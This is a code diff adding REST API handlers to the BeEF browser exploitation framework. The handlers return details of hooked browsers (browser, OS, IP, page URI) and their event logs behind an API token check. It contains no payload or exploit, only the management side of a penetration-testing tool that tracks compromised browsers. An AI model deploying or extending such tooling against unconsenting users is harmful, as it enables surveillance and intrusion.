+        def get_hb_details(hb)
+           details = BeEF::Core::Models::BrowserDetails
+
+           {
+               'id' => hb.id,
+               'session' => hb.session,
+               'name' => details.get(hb.session, 'BrowserName'),
+               'version' => details.get(hb.session, 'BrowserVersion'),
+               'os' => details.get(hb.session, 'OsName'),
+               'platform' => details.get(hb.session, 'SystemPlatform'),
+               'ip' => hb.ip,
+               'domain' => details.get(hb.session, 'HostName'),
+               'port' => hb.port.to_s,
+               'page_uri' => details.get(hb.session, 'PageURI')
+           }
+        end
+
+      end
+    end
+  end
+end
--- a/core/main/rest/handlers/logs.rb
+++ b/core/main/rest/handlers/logs.rb
@@ -0,0 +1,67 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Logs < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        #
+        # @note Get all global logs
+        #
+        get '/' do
+          logs = BeEF::Core::Models::Log.all()
+          logs_to_json(logs)
+        end
+
+        #
+        # @note Get hooked browser logs
+        #
+        get '/:session' do
+          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
+          error 401 unless hb != nil
+
+          logs = BeEF::Core::Models::Log.all(:hooked_browser_id => hb.id)
+          logs_to_json(logs)
+        end
+
+        private
+
+        def logs_to_json(logs)
+          logs_json = []
+          count = logs.length
+
+          logs.each do |log|
+            logs_json << {
+                'id' => log.id.to_i,
+                'date' => log.date.to_s,
+                'event' => log.event.to_s,
+                'type' => log.type.to_s
+            }
+          end
+
+          {
+              'logs_count' => count,
+              'logs' => logs_json
+          }.to_json if not logs_json.empty?
+
+        end
+
+      end
+    end
+  end
+end
--- a/Show More
+++ b/Show More